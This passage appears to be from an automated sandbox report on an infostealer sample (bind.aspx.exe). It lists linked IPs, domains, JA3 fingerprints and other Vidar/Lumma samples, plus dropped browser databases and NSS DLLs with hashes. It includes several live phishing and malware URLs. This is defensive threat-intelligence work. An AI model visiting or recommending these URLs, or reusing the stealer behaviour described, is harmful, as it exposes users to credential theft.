                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • VT rate limit hit for: bind.aspx.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      23:01:45API Interceptor1x Sleep call for process: bind.aspx.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      95.164.119.162Unlock_Tool_5.0.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      81bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      xnfvsO7kVN.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                      • stadiatechnologies.com/
                                                                                                                      104.102.49.254https://steamcommninty.com/activates/giftsGet hashmaliciousUnknownBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                                                                              gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  zlsXub68El.exeGet hashmaliciousVidarBrowse
                                                                                                                                    0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                          135.181.31.18SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            steamcommunity.comhttps://steamcommninty.com/activates/giftsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            zlsXub68El.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            stadiatechnologies.comSecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            Unlock_Tool_5.0.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            81bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            xnfvsO7kVN.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            1p5yg5LO0h.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                            • 95.164.119.162

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            VAKPoltavaUkraineUASecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            Unlock_Tool_5.0.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            81bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            xnfvsO7kVN.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            1p5yg5LO0h.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                                                                                                            • 95.164.119.162
                                                                                                                                            HETZNER-ASDEhttp://1d807473.flca.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                            • 195.201.57.90
                                                                                                                                            http://cdn.prod.website-files.com:80/65f02675f8a97005cc28dca1/66cf319e76a975faf0a504d6_10698624705.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 49.12.202.237
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 5.75.211.162
                                                                                                                                            ATT71725.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 135.181.18.187
                                                                                                                                            zlsXub68El.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 5.75.211.162
                                                                                                                                            http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 88.198.5.198
                                                                                                                                            https://dailycontestportal.live/africa/cm/orange-reward-survey-1/fr-1.php/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 178.63.248.57
                                                                                                                                            https://tokenp0kczt.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 88.198.5.198
                                                                                                                                            http://tokenpblket.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 88.198.5.198
                                                                                                                                            https://f0mlxe0jneh1.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 195.201.57.90
                                                                                                                                            AKAMAI-ASUShttps://steamcommninty.com/activates/giftsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                            • 23.57.90.145
                                                                                                                                            Macabacus-9.7.2.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 184.28.90.27
                                                                                                                                            https://www.dropbox.com/scl/fi/4fnryjjmfp8le01uyciyl/IASSecurity.paper?rlkey=4ezd7413h2y3rkfjifz9e7enl&st=6sa33sex&dl=0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.102.43.106
                                                                                                                                            042258835-17458857786.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 184.28.90.27
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            https://img1.wsimg.com/blobby/go/0fb15fac-f667-4c74-8a1e-27661514d143/downloads/87458256888.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 23.195.92.153
                                                                                                                                            https://www.pineapplehospitality.net/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.102.19.45
                                                                                                                                            SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                            • 2.19.126.163
                                                                                                                                            Electronic Receipt for Carolann Campbell.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.78.188.188

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            zlsXub68El.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 135.181.31.18
                                                                                                                                            37f463bf4616ecd445d4a1937da06e19useraccount.aspx.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                            • 104.102.49.254
                                                                                                                                            file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                            • 104.102.49.254

                                                                                                                                            Dropped Files

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            C:\ProgramData\GCAEHDBAAECB\freebl3.dllfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                C:\ProgramData\GCAEHDBAAECB\mozglue.dllfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\BKKFHI

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                    Entropy (8bit):1.137181696973627
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\CBFBKF

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.848598812124929
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\CGHCGI

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\DGDBAK

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\FBFIJJ

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9370
                                                                                                                                                                                    Entropy (8bit):5.514140640374404
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                    MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                    SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                    SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                    SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\FCAAAA

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\FIDAFC

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                    Entropy (8bit):1.1215420383712111
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\GCAEHD

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\GHCGDA

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\freebl3.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
